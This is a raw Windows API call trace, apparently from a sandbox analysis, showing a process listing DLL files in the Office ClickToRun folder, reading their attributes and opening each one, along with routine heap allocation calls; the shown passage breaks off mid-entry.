GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0074.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.349] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.350] AreFileApisANSI () returned 1 [0074.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 89 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0074.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0074.351] AreFileApisANSI () returned 1 [0074.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0074.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.502] GetFileType (hFile=0x42c) returned 0x1 [0074.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.502] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.502] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.502] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.502] CloseHandle (hObject=0x42c) returned 1 [0074.502] AreFileApisANSI () returned 1 [0074.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0074.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.503] GetFileType (hFile=0x42c) returned 0x1 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.503] CloseHandle (hObject=0x42c) returned 1 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.504] AreFileApisANSI () returned 1 [0074.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0074.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0)) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0074.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.505] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0074.506] AreFileApisANSI () returned 1 [0074.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 94 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.506] AreFileApisANSI () returned 1 [0074.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0074.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0074.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0074.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.507] GetFileType (hFile=0x42c) returned 0x1 [0074.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.507] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.507] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.507] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.507] CloseHandle (hObject=0x42c) returned 1 [0074.508] AreFileApisANSI () returned 1 [0074.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0074.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0074.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0074.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.508] GetFileType (hFile=0x42c) returned 0x1 [0074.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.508] CloseHandle (hObject=0x42c) returned 1 [0074.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.508] RtlAllocateHeap 